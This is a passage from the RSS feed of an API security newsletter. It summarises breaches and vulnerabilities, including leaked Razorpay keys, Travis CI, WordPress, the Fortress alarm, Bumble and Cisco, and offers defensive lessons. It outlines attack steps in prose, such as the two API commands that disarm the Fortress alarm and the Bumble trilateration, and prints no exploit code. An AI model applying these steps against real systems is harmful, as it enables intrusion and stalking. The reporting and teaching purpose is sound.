<h2>Breach: Exposed payment integration API keys</h2>
<p>The big news story this week was <a href="https://bevigil.com/blog/exposed-payment-integration-api-keys-imperil-millions-of-users-transaction-details-and-pii/" target="_blank" rel="noopener noreferrer">the leakage of API keys for payment integrations</a> that potentially exposed transaction details and personally identifiable information (PII) of millions of users.</p>
<p>CloudSEK, the maker of artificial intelligence-enabled digital threat protection, revealed that many mobile applications have API keys hard-coded into the application packages. This is <em>security by obfuscation,</em> because a hacker could easily recover such tokens, using just basic reverse engineering skills.</p>
<p>Indeed, the researchers at CloudSEK discovered that of the 13 000 applications currently uploaded to their BeVigil site, approximately 250 used the Razorpay API to enable financial transactions — the most critical information since it pertains directly to users&#8217; financial details and PII.</p>
<p>Most worryingly, CloudSEK found that ten applications using the RazorPay API appeared to be exposing their integration key ID and secret. The impact of such exposure includes the possibility for a rogue actor doing the following:</p>
<ul>
<li>Query payment information</li>
<li>Revoke unauthorized transactions</li>
<li>Access PII details (like phone numbers and email addresses), transaction details, order and refund details</li>
</ul>
<p>The researchers suggest that such key exposure could allow attackers to issue high-value refunds for items purchased, or sell the details on the dark web.</p>
<p>Lessons learned here include:</p>
<ul>
<li>Being reliant on<em> security by obscurity</em> (here &#8220;hiding&#8221; API keys in an application package) is no substitute for robust security controls. In this case, it is the equivalent of locking a house door and leaving the key under the doormat.</li>
<li>Application developers should anticipate that sensitive API keys and tokens may be exposed during an application&#8217;s lifecycle and should have robust, repeatable mechanisms in place for revoking and recycling exposed credentials.</li>
<li>Sensitive credentials should <em>never</em> be committed into version control systems — we discuss this below in more detail.</li>
</ul>
<h2>Breach: Leaked API tokens on Travis CI</h2>
<p>The other <a href="https://portswigger.net/daily-swig/credential-leak-fears-raised-following-security-breach-at-travis-ci" target="_blank" rel="noopener noreferrer">big news</a> this week was the breach at the popular CI SaaS platform, Travis CI. They have acknowledged the breach, but sought to downplay its significance in a <a href="https://travis-ci.community/t/security-bulletin/12081" target="_blank" rel="noopener noreferrer">post</a> on their community forum.</p>
<p>The breach was significant in terms of both the scope and the potential impact: by forking a public repository and then issuing a pull request, attackers could gain access to the entire environment of the upstream repository, including all secret values like API keys and tokens. Such credentials would typically be used for access to downstream infrastructure environments, such a cloud hosting and binary repositories. A compromise of such API tokens could quite easily poison entire software supply chains. We all still remember <a href="https://apisecurity.io/issue-114-solarwinds-pickpoint-breaches-github-code-scanning-review-graphql-security/" target="_blank" rel="noopener noreferrer">SolarWinds</a>, right?</p>
<p>Travis CI stated that they had resolved the underlying problem with a series of security patches, and suggested that users change passwords and rotate tokens and keys. As further mitigation, they noted that this vulnerability applied only to public repositories, although in practice these are simply the ones most likely to be forked at scale.</p>
<p>The security industry was somewhat critical of this response. A member of the security research team at Etherium, Péter Szilágyi, was <a href="https://twitter.com/peter_szilagyi/status/1437646122751873028?s=20" target="_blank" rel="noopener noreferrer">critical</a> of Travis CI, in particular on their incident response, stating:</p>
<blockquote><p>&#8220;<em>No analysis, no security report, no post-mortem, not warning any of their users that their secrets might have been stolen</em>&#8220;.</p></blockquote>
<p>Furthermore, the renowned malware researcher Jake Williams <a href="https://twitter.com/MalwareJake/status/1437729186878271489" target="_blank" rel="noopener noreferrer">concluded</a> that they were &#8220;<em>guilty of an abysmal failure in handling an extremely serious vulnerability</em>”.</p>
<p>The key lesson here for users and API consumers is that API tokens and keys are valuable assets, particularly when they govern access to your downstream supply chain. Unfortunately, as this Travis CI incident reveals, the token or key owner is at the mercy of 3rd party platforms for the secure storage and use of said tokens. Best practice would be to assume that a total disclosure of all API tokens and keys is a possibility and set in place a well-rehearsed procedure for the revoking and re-issuing them.</p>
<h2>Opinion: SAST/DAST shortcomings for API security testing</h2>
<p>I was pleased to be <a href="https://thenewstack.io/application-security-tools-are-not-up-to-the-job-of-api-security/" target="_blank" rel="noopener noreferrer">featured</a> in the NewStack this week, discussing the pros and cons of the stalwarts of Application Security (AppSec) testing — namely SAST and DAST — for the security testing of APIs.</p>
<p>My view is that most organizations will be running some form of AppSec program, nearly always deploying SAST and in most cases some form of DAST too. As organizations increasingly adopt APIs, the discerning AppSec manager is posed with a question if the existing tools are adequate for the task of API security testing, or whether they should be supplemented with more specialist tools. My conclusion is that the best approach is to complement your existing test regime with specialist tools that give more insight and context into API-specific security issues.</p>
<p>Based on over a decade&#8217;s experience using and developing SAST/DAST tools, my view is that fundamentally these tools lack the context required to accurately detect many API security issues. In the case of SAST, these tools were designed to work with web pages built, for example, on Java Servlet Pages or .Net ASP pages. Such tools may not be able to adequately recognize API ingress points — like function decorators in a Python Flask API application — and as such are unable to construct a sufficiently accurate model for analysis.</p>
<p>DAST also lacks context when analyzing APIs, because the technology is typically expecting a website and will &#8220;spider&#8221; the site to find entry points, such as forms that can be attacked or fuzzed. Many DAST tools lack the ability to enumerate REST API endpoints, meaning that large gaps may exist in their coverage. Additionally, DAST is typically performed later in the development lifecycle because they require a largely functional application to assess, whereas API-specific test tools can be deployed in parallel to the initial development activity, thus allowing a hard &#8220;shift-left&#8221; approach. The differences are summarised below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8583" src="https://apisecurity.io/wp-content/uploads/2021/09/Article3-1.jpg" alt="" width="1034" height="455" /></p>
<p>My conclusion is that SAST/DAST tools provide significant efficacy in reducing application vulnerabilities and that the addition of API-centric test tools into an existing AppSec program ensures that API coverage is even further improved. It&#8217;s a case of defense in depth.</p>
<h2>Article: The value of API specification frameworks</h2>
<p>Finally, this week we have an <a href="https://securityboulevard.com/2021/09/improving-development-and-security-collaboration-with-api-specification-frameworks/" target="_blank" rel="noopener noreferrer">article on the value of API specification frameworks</a>, such as the OpenAPI Specification (OAS),  which allow organizations to drive both the quality and security aspects of their API development.</p>
<p>By using a central repository of APIs and a well-specified and open standard like the OAS, it is possible to define APIs in a language-agnostic and machine-consumable format that allows for the following:</p>
<ul>
<li>Automatically generate API &#8220;stub&#8221; functions for development activity</li>
<li>Auto-generating mocking frameworks for integration and unit testing</li>
<li>Test the conformance and performance of API implementations against the specified contract</li>
<li>Automatically audit the security and quality of API definitions as they are developed and committed to version control</li>
</ul>
<p>The author Sheryans Mehta concludes that although an API development approach centered on API specifications requires a commitment in time and effort, this is rewarded in the long run: <em>&#8220;The reality is that shift left IS working, it IS catching flaws earlier.&#8221;</em></p>
<p>The post <a href="https://apisecurity.io/issue-152-exposed-api-keys-tokens-sast-dast-api-security-testing-value-api-specifications/">Issue 152: Exposed API keys and tokens, SAST/DAST for API security testing, the value of API specifications</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 151: WordPress 5.8.1 security patch, API botnet attacks report, articles on API tokens and API discovery</title>
		<link>https://apisecurity.io/issue-151-wordpress-5-8-1-security-patch-api-botnet-attacks-report-articles-api-tokens-api-discovery/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 15 Sep 2021 19:15:57 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8534</guid>

					<description><![CDATA[<p>This week, we have details on the security patch in WordPress 5.8.1 fixing an issue on the REST API, a report on the rise of botnet attacks on APIs, an article on everything you need to know about API tokens, and thoughts on API discovery. Vulnerability: Security patch to REST API in WordPress 5.8.1 Last [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-151-wordpress-5-8-1-security-patch-api-botnet-attacks-report-articles-api-tokens-api-discovery/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-151-wordpress-5-8-1-security-patch-api-botnet-attacks-report-articles-api-tokens-api-discovery/">Issue 151: WordPress 5.8.1 security patch, API botnet attacks report, articles on API tokens and API discovery</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have details on the security patch in WordPress 5.8.1 fixing an issue on the REST API, a report on the rise of botnet attacks on APIs, an article on everything you need to know about API tokens, and thoughts on API discovery.</p>
<h2>Vulnerability: Security patch to REST API in WordPress 5.8.1</h2>
<p>Last Friday saw a security and maintenance release for WordPress, with the details of version 5.8.1 available <a href="https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/" target="_blank" rel="noopener noreferrer">here</a>. This release features 60 bug fixes and — most importantly — three security fixes, namely:</p>
<ul>
<li>A data exposure vulnerability within the WordPress REST API</li>
<li>An XSS vulnerability in the block editor</li>
<li><code>Lodash</code> library updated to version 4.17.21 to incorporate upstream security fixes</li>
</ul>
<p>Of interest to us is the vulnerability related to the WordPress REST API, detailed more fully in <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200" target="_blank" rel="noopener noreferrer">CVE-2021-39200</a>.</p>
<p>WordPress provides an internal helper method <code>wp_die</code> that is called when an error occurs in the WordPress core. Unfortunately, the existing implementation of the handler emitted excessive internal data including nonces. This would allow an attacker to gain access to nonces which in turn could allow unauthorized access to core WordPress API methods. The fix shown below is available on <a href="https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706" target="_blank" rel="noopener noreferrer">GitHub</a> here.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8541" src="https://apisecurity.io/wp-content/uploads/2021/09/Article1-1.jpg" alt="" width="1064" height="513" /></p>
<p>Because of the fixed security issues, WordPress recommends users to update their installations to the new version as soon as possible.</p>
<p>The main lessons learned here are:</p>
<ul>
<li>Complex systems, such as WordPress, can relatively easily be compromised by their APIs. In security-sensitive applications, it may be advisable to disable such APIs if they are not required.</li>
<li>Information leaks are a constant threat to software systems — this one is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">API3:2019 — Excessive data exposure</a>, whereby sensitive data is inadvertently leaked allowing system compromise.</li>
</ul>
<h2>Opinion: Botnet attacks on APIs</h2>
<p>This week featured an <a href="https://securityintelligence.com/articles/how-companies-can-prepare-botnet-attacks-apis/" target="_blank" rel="noopener noreferrer">article</a> in SecurityIntelligence, covering the rise of the APIs and — specifically — how APIs may increasingly be under threat from botnets weaponized against APIs and Denial of Service (DoS) attacks.</p>
<p>The article quotes various references driving the rise of API adoption <a href="https://www.devopsdigest.com/api-adoption-on-the-rise-across-all-industries" target="_blank" rel="noopener noreferrer">suggesting</a> that in 2021, over 70% of organizations will be using APIs in their business solutions. Of particular concern is the rise in the number of organizations that will expose those APIs to the internet or to third-party APIs. According to a <a href="https://www.radware.com/getattachment/1f3a5652-6e13-4902-9ecb-6c45c5b98197/Radware-App-Security-Report-Final-12021.pdf.aspx" target="_blank" rel="noopener noreferrer">survey</a> from Radware and Osterman Research, nearly 40% of respondents stated that over half of their applications were exposed in this manner.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8545" src="https://apisecurity.io/wp-content/uploads/2021/09/Article2-1.jpg" alt="" width="602" height="458" /></p>
<p>Even more concerning was the fact that nearly half of the participants had experienced an injection attack, and that monthly DoS attacks were even more prevalent.</p>
<p>Key takeaways here are:</p>
<ul>
<li>Implement some form of rate-limiting on key APIs to mitigate against bot attacks.</li>
<li>Consider the use of multi-factor authentication (for example via OAuth2 protocol) to reduce the impact of bot attacks.</li>
<li>Use identity and access management, such as Role-Based Access Control (RBAC) to restrict which resources are accessible through user accounts.</li>
</ul>
<h2>Article: API tokens</h2>
<p>A key pillar in a holistic approach to API security is the judicious use and management of API tokens. Unfortunately, this is a domain that is frequently poorly understood and often poorly implemented.</p>
<p>This week we are fortunate enough to <a href="https://fly.io/blog/api-tokens-a-tedious-survey/" target="_blank" rel="noopener noreferrer">feature</a> a fantastic (and exhaustive) overview by Thomas H. Ptacek on the use of API tokens. The article is written in a wonderfully humorous way with tongue always firmly in cheek — &#8220;<em>Canonically, OAuth lets a 3rd party post a tweet with your account.&#8221;</em></p>
<p>More importantly, the article is well-referenced, opinionated, and almost certain to be valuable to anyone involved in the implementation of API solutions.</p>
<p>The <em>state of play</em> for API tokens is summarized succinctly here:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8549" src="https://apisecurity.io/wp-content/uploads/2021/09/Article3.jpg" alt="" width="725" height="413" /></p>
<h2>Article: API discovery</h2>
<p>Finally this week, we have <a href="https://apievangelist.com/2021/02/11/gathering-my-thoughts-on-api-discovery/" target="_blank" rel="noopener noreferrer">musings</a> from <em>API Evangelist</em> on the joys of all things relating to API discovery, of interest to anyone involved in the development or use of APIs. In a nutshell, the suggested sources for discovery are (in no particular order):</p>
<ul>
<li><a href="https://www.programmableweb.com/" target="_blank" rel="noopener noreferrer">ProgrammableWeb</a></li>
<li><a href="https://rapidapi.com/marketplace" target="_blank" rel="noopener noreferrer">Rapid API</a></li>
<li><a href="http://apisjson.org/" target="_blank" rel="noopener noreferrer">APIs.json</a></li>
<li><a href="http://apis.io/" target="_blank" rel="noopener noreferrer">APIs.io</a></li>
<li><a href="https://apis.guru/" target="_blank" rel="noopener noreferrer">APIs.guru</a></li>
<li><a href="https://www.postman.com/collection/" target="_blank" rel="noopener noreferrer">Postman Collections</a></li>
<li><a href="https://swagger.io/tools/swaggerhub/" target="_blank" rel="noopener noreferrer">SwaggerHub</a></li>
<li><a href="https://www.postman.com/explore" target="_blank" rel="noopener noreferrer">Postman API Network</a></li>
<li>Just Google it!</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-151-wordpress-5-8-1-security-patch-api-botnet-attacks-report-articles-api-tokens-api-discovery/">Issue 151: WordPress 5.8.1 security patch, API botnet attacks report, articles on API tokens and API discovery</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 150: Vulnerability in Fortress home security system, API fuzzing techniques, hardening GraphQL implementations, and central governance for APIs</title>
		<link>https://apisecurity.io/issue-150-vulnerability-fortress-home-security-system-api-fuzzing-techniques-hardening-graphql-implementations-central-governance-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 09 Sep 2021 06:00:56 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8507</guid>

					<description><![CDATA[<p>This week, we have recent vulnerabilities in the Fortress home security system that allowed an attacker to remotely disable the system, a guide on API fuzzing techniques and tools, best practice for hardening GraphQL implementations, and views on central governance for APIs. Vulnerability: Fortress home security vulnerability allows remote disarming This week, Rapid7 disclosed two [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-150-vulnerability-fortress-home-security-system-api-fuzzing-techniques-hardening-graphql-implementations-central-governance-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-150-vulnerability-fortress-home-security-system-api-fuzzing-techniques-hardening-graphql-implementations-central-governance-apis/">Issue 150: Vulnerability in Fortress home security system, API fuzzing techniques, hardening GraphQL implementations, and central governance for APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have recent vulnerabilities in the Fortress home security system that allowed an attacker to remotely disable the system, a guide on API fuzzing techniques and tools, best practice for hardening GraphQL implementations, and views on central governance for APIs.</p>
<h2>Vulnerability: Fortress home security vulnerability allows remote disarming</h2>
<p>This week, Rapid7 <a href="https://techcrunch.com/2021/08/31/fortress-home-security-rapid7/" target="_blank" rel="noopener noreferrer">disclosed</a> two vulnerabilities in Fortress S03 WiFi home security system that their researcher Arvind Vishwakarma discovered. The vulnerabilities allowed an attacker to remotely disarm the alarm system using an unauthenticated API endpoint and elementary and easily obtainable user account information, such as an email address. At the time of writing, Fortress had not acknowledged the issue, nor provided any indication of an intent to resolve it. It is also not known if the issue can be resolved without a hardware upgrade.</p>
<p>The first vulnerability relates to an unauthenticated API endpoint on the public management portal of the alarm system. The attack consists of two requests, namely:</p>
<ol>
<li>A call to the command <code>30001</code> with the target&#8217;s email address provided as a parameter.</li>
<li>Using the International Mobile Equipment Identity (IMEI) returned in the previous call, a subsequent call to the command <code>00005</code> to disarm the system.</li>
</ol>
<p>A suitably motivated attacker could easily gain knowledge of an intended target&#8217;s email address, provided they knew the physical address of a user of the affected Fortress security system. The API endpoints are presumably for internal use only (Fortress does not appear to have documented them) but — as shown below — can very easily be manipulated to disable the system:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8512" src="https://apisecurity.io/wp-content/uploads/2021/09/Article1.jpg" alt="" width="621" height="958" /></p>
<p>The second vulnerability relates to the use of an unencrypted radio frequency (RF) channel for key fobs and accessories. An attacker could record RF packets for disarming a system and then replay these to disarm a target system since no there is no encryption protecting the packet payload.</p>
<p>The original disclosure (including the above image) is available on the Rapid7 website and disclosed as <a href="https://www.rapid7.com/blog/post/2021/08/31/cve-2021-3927-67-fortress-s03-wifi-home-security-system-vulnerabilities/" target="_blank" rel="noopener noreferrer">CVE-2021-3927[67]</a>.</p>
<p>The lessons learned here include:</p>
<ul>
<li>This is a blatant case of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 — Broken authentication</a>, or more to-the-point, authentication that is entirely absent in this case.</li>
<li>Undisclosed but publicly accessible API endpoints can easily be discovered and reverse engineered by researchers and attackers alike.</li>
</ul>
<h2>Guide: Fuzzing techniques to improve your API test coverage</h2>
<p>Renowned API researcher/hacker Alissa Knight recently published a whitepaper entitled &#8220;<a href="https://labs.detectify.com/2021/08/31/go-fuzz-yourself-how-to-find-more-vulnerabilities-in-apis-through-fuzzing-whitepaper-download/?utm_source=referral&amp;utm_medium=referral&amp;utm_campaign=alissaknight" target="_blank" rel="noopener noreferrer">Go Fuzz Yourself</a>&#8220;. The whitepaper makes a powerful case for the use of fuzzing techniques as part of an approach to securing APIs. Primarily intended for red-team members or pentesters, the paper is of interest to AppSec professionals wanting to further improve the coverage of their API portfolio.</p>
<p>Knight&#8217;s view is that a reliance on pentesting or static analysis alone results in false negatives that leads to vulnerabilities remaining undiscovered. At an executive level, this may lead to CISOs concluding that their security posture is artificially strong. In reality, APIs may have latent vulnerabilities which remain undiscovered and which attacker with automated tooling may easily exploit. Knight endorses the wide-scale adoption of the OpenAPI Specification (OAS) as part of a &#8220;shift left&#8221; approach to API development and security of said APIs. With a well-defined OpenAPI definition, it is possible to conduct automated testing further downstream in the software development life cycle.</p>
<p>In the absence of an OpenAPI definition, Knight describes how an API can be partially &#8220;reverse-engineered&#8221; by using the <a href="https://github.com/assetnote/kiterunner" target="_blank" rel="noopener noreferrer">Kiterunner</a> tool. Kiterunner is a content discovery tool specifically designed for the enumeration and discovery of APIs. From their GitHub:</p>
<blockquote><p><em> &#8220;When using traditional content discovery tooling, such routes are often missed and cannot easily be discovered. By collating a dataset of Swagger specifications and condensing it into our own schema, Kiterunner can use this dataset to bruteforce API endpoints by sending the correct HTTP method, headers, path, parameters, and values for each request it sends.&#8221;</em></p></blockquote>
<p>Knight provides a clear demonstration of Kiterunner in action, showing how it is possible to enumerate a set of API endpoints and then either to fuzz these endpoints with arbitrary data payloads, or to redirect the requests to Burp Suite for further investigation. The API discovery uses a master word list of common REST API nouns and verbs, built from the ingestion of large collections of public OpenAPI definitions. By fuzzing a combination of these nouns and verbs, the tool effectively maps out the API under attack as illustrated below.</p>
<p><img loading="lazy" decoding="async" class=" wp-image-8516 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/09/Article2.jpg" alt="" width="1024" height="521" /></p>
<p>Knight also describes Microsoft&#8217;s RESTler tool, which is able to exercise an API based on the underlying OpenAPI definition.</p>
<p>Key takeaways from here include:</p>
<ul>
<li>Existing static analysis and dynamic analysis tools on their own will leave undiscovered vulnerabilities in an API.</li>
<li>Similarly, reliance on pentesting or manual testing alone will also result leave vulnerabilities undiscovered.</li>
<li>Content discovery is a powerful tool for the enumeration of undocumented APIs.</li>
<li>An OpenAPI definition is a powerful aid toward driving a &#8220;shift left&#8221; approach to API development and security.</li>
<li>Thorough security testing of an API is a time-consuming process, and a savvy tester should make use of tools such as those described in the article.</li>
</ul>
<h2>Best practices: Hardening your GraphQL implementations</h2>
<p>We also have an excellent <a href="https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready" target="_blank" rel="noopener noreferrer">guide</a> from Jens Neuse on hardening and securing GraphQL API implementations. Increasingly, developers are providing GraphQL APIs to represent more complex datasets and relationships that can readily be presented through REST APIs. Neuse&#8217;s hypothesis is that with the relative increased complexity of GraphQL APIs, the are more likely to be insecure. A simple metric that Neuse presents is that the size of the codebase required to render a GraphQL query is about four times the size required to parse a URL — more code is likely to provide for more vulnerabilities. Simply browsing the vulnerabilities on <a href="https://hackerone.com/hacktivity?querystring=graphql" target="_blank" rel="noopener noreferrer">HackerOne</a> suggests this hypothesis has some credence.</p>
<p>The article provides a detailed description and illustration of thirteen of the most common GraphQL security issues. Whilst some are relatively benign or corner cases, there are significant issues relating to data leakage, denial of service (DoS) attacks, SQL injections, CSRF vulnerabilities, and authentication vulnerabilities.</p>
<p>Finally, Neuse concludes with detailed development guidelines aimed at reducing the likelihood and impact of typical GraphQL API implementations. This easily readable and well-written guide should prove invaluable to API developers and security teams alike.</p>
<h2>Opinion: Toward a central data governance model for APIs</h2>
<p>Finally this week, we have an<a href="https://hackernoon.com/save-api-costs-with-data-centric-security" target="_blank" rel="noopener noreferrer"> opinion piece</a> from Brian Platz on the evolution of a central data governance model for APIs. Platz suggests that the increased adoption of APIs — led by the likes of Facebook, Google, Uber, and Airbnb — has blurred the more traditional boundaries of a simple producer—consumer model. Increased business pressure to open up access to core business data through APIs has led to a complex data governance paradigm.</p>
<p>As an illustration of this increased complexity, consider the example of a developer implementing a new API endpoint. The API developer is responsible for decisions on how the said endpoint should be authenticated to (standard pattern such as OAuth2 exist to this end) and how users should be authorized, and this is where the challenges begin. Developers may not have the full context of the data rendered by their API and may be overly permissive in allowing access. Platz suggests that organizations with complex data governance and privacy requirements provide centralized functions to allow access to data, thereby allowing data and security experts to control data access rather than the API developers.</p>
<p>The article concludes with an optimistic view on the future state: <em>&#8220;A data-centric approach to security makes data governance more automated and scalable, which, in turn, allows organizations to open data sets more freely to consumers of that data&#8221;</em>. Somewhat paradoxically, more rigid controls on data at source open up the possibility of more open and accessible data to consumers and end users.</p>
<p>The post <a href="https://apisecurity.io/issue-150-vulnerability-fortress-home-security-system-api-fuzzing-techniques-hardening-graphql-implementations-central-governance-apis/">Issue 150: Vulnerability in Fortress home security system, API fuzzing techniques, hardening GraphQL implementations, and central governance for APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 149: Vulnerabilities on Cisco routers and Bumble, adopting Zero Trust for APIs, a hacker&#8217;s view on API security challenges</title>
		<link>https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide-2/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 01 Sep 2021 19:20:56 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8484</guid>

					<description><![CDATA[<p>This week, we have vulnerabilities on Cisco routers allowing device takeover, a vulnerability on the Bumble app disclosing user&#8217;s location, a view on adopting Zero Trust for APIs, and a hacker&#8217;s view on API security challenges. Vulnerability: Cisco releases critical patches Cisco Systems has released a total of six security patches for API vulnerabilities this [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide-2/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-148-microsoft-power-apps-breach-bola-topcoder-portal-rfc-9101-released-api-hacking-guide-2/">Issue 149: Vulnerabilities on Cisco routers and Bumble, adopting Zero Trust for APIs, a hacker&#8217;s view on API security challenges</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have vulnerabilities on Cisco routers allowing device takeover, a vulnerability on the Bumble app disclosing user&#8217;s location, a view on adopting Zero Trust for APIs, and a hacker&#8217;s view on API security challenges.</p>
<h2>Vulnerability: Cisco releases critical patches</h2>
<p>Cisco Systems has released a total of six security patches for API vulnerabilities this week. The patches were related to their high-end networking equipment, as detailed in <a href="https://threatpost.com/cisco-issues-critical-fixes-for-high-end-nexus-gear/168939/" target="_blank" rel="noopener noreferrer">this article</a> from Threatpost. The most serious of these was rated as critical with a severity of 9.1 and allowed possible overwrite of the target filesystem. The vulnerability is detailed in NIST <a href="https://nvd.nist.gov/vuln/detail/CVE-2021-1577" target="_blank" rel="noopener noreferrer">CVE-2021-1577</a> as well as by <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-capic-frw-Nt3RYxR2" target="_blank" rel="noopener noreferrer">Cisco</a> themselves.</p>
<p>Cisco provides no details of the vulnerability, or how it was discovered. The vulnerability originated in improper access control in the device Application Policy Infrastructure Controller (APIC) API, which could allow an unauthenticated remote attacker to read or write arbitrary files on the target system. An attacker with sufficient knowledge of the target system could use this ability to exploit the target, up to and including even the possibility of re-writing the device firmware if this was not protected adequately.</p>
<p>The lessons learned here are:</p>
<ul>
<li>This is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">API2:2019 Broken Authentication</a> — ensure that <em>all</em> API endpoints are protected.</li>
<li>The ability to manipulate a target filesystem is dangerous at the best of times, but for an embedded system this can lead to the compromised control and full takeover of the target.</li>
</ul>
<h2>Vulnerability: User&#8217;s location revealed on Bumble app</h2>
<p>In a wonderfully written <a href="https://robertheaton.com/bumble-vulnerability/" target="_blank" rel="noopener noreferrer">blog post</a>, Robert Heaton reveals how a combination of API vulnerabilities and poor backend design decisions allowed an attacker to determine the precise location of a user of the app. The exploit is definitely non-trivial but Heaton humorously describes it in great detail.  This discovery led to a $2000 bounty for him and the introduction of platform restrictions to mitigate future attacks.</p>
<p>The exploit relies on a technique called <em>trilateration</em> which allows a precise location to be determined if three other locations are known with sufficient precision. This is best illustrated by this diagram:</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-8489" src="https://apisecurity.io/wp-content/uploads/2021/09/Image1.jpg" alt="" width="1000" height="514" /></p>
<p>Heaton had previously <a href="https://robertheaton.com/bumble-vulnerability/#:~:text=re-derive%20a%20victim%E2%80%99s%20almost-exact%20location" target="_blank" rel="noopener noreferrer">described this technique</a> relating to the Tinder app, which was subsequently mitigated by performing distance calculations on the server rather that relaying high-precision information to the client. Keeping user&#8217;s exact locations secret is relatively easy to get wrong — as Heaton puts it: <em>&#8220;As one of the trailblazers of location-based online dating, Tinder was inevitably also one of the trailblazers of location-based security vulnerabilities.&#8221; </em></p>
<p>Obviously, the location of the target cannot be manipulated by the attacker. However, the attacker is able to fake their own location, and by using a poorly implemented API endpoint, then determine three different distances to the target. What Tinder had already fixed, but Bumble had not, was the rounding of distances, so that the accuracy of trilateration was not precise enough to allow pinpointing the exact location of a user.</p>
<p>The exploit was possible by two additional weaknesses in the API implementation on the Bumble backend:</p>
<ul>
<li>It was possible to use an unprotected API to generate the beeline view to determine the target&#8217;s location without actually being in their their &#8220;feed&#8221;.</li>
<li>The API endpoint relied on an MD5 hash to protect payload manipulation but performed the calculation on the client-side, making it easily reverse-engineered.</li>
</ul>
<p>Bumble has since fixed the issues. The lessons learned here are:</p>
<ul>
<li>Never rely on obfuscation or client-side protections to secure an API endpoint — Bumble was found lacking on both counts here.</li>
<li>It was possible to access random users&#8217; profile information without being in their feed — another case of <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">BOLA</a>.</li>
</ul>
<p>If all this sounds somewhat familiar to our regular readers, similar vulnerabilities in Bumble were already discussed in our <a href="https://apisecurity.io/issue-110-api-flaws-bumble-covid-kaya-forrester-api-security-asc-2020-talks/" target="_blank" rel="noopener noreferrer">issue 110</a>. Looks like the fixes done at that time left room for improvement.</p>
<h2>Approach: Adopting Zero Trust for API security</h2>
<p>Security Boulevard <a href="https://securityboulevard.com/2021/08/adopting-zero-trust-for-api-security/" target="_blank" rel="noopener noreferrer">featured</a> the impact of the adoption of a Zero Trust model toward securing APIs. The same topic was covered in further detail by Forrester in <a href="https://venturebeat.com/2021/08/29/forrester-why-apis-need-zero-trust-security/" target="_blank" rel="noopener noreferrer">this article</a>.</p>
<p>The principle of Zero Trust is as simple as the name implies: in an environment where the network boundary has largely been eliminated and where all devices are untrusted, it is vital that software is designed to authenticate and authorize <em>all</em> access to <em>all</em> systems, continuously. Assume the network and devices are hostile at all times.</p>
<p>From an API perspective, this means dispelling the concept of internal-only APIs: all APIs should be considered to either be externally facing, either already or in the future. All APIs should be regarded as first-class citizens and fully protected with adequate authentication and authorization controls. Security Boulevard concludes by suggesting the following high-level approach:</p>
<ul>
<li>Understand your API inventory: who has access, and at what level.</li>
<li>Utilize Role-Based Access Control (RBAC) to eliminate unnecessary access.</li>
<li>Enforce the principle of least privilege.</li>
</ul>
<p>Forrester lead with the view that the first step toward securing APIs is to perform an exhaustive inventory of which APIs exist in the organization, and which of those endpoints are secured. This also allows for the discovery of so-called<em> &#8216;rogue endpoints&#8217;</em>  originating from shadow IT practices —  an unquantified risk in an organization. Once an inventory is established, the focus can then move toward an API governance model integrated with the DevOps practice.</p>
<h2>Industry view: A hacker&#8217;s perspective on API security</h2>
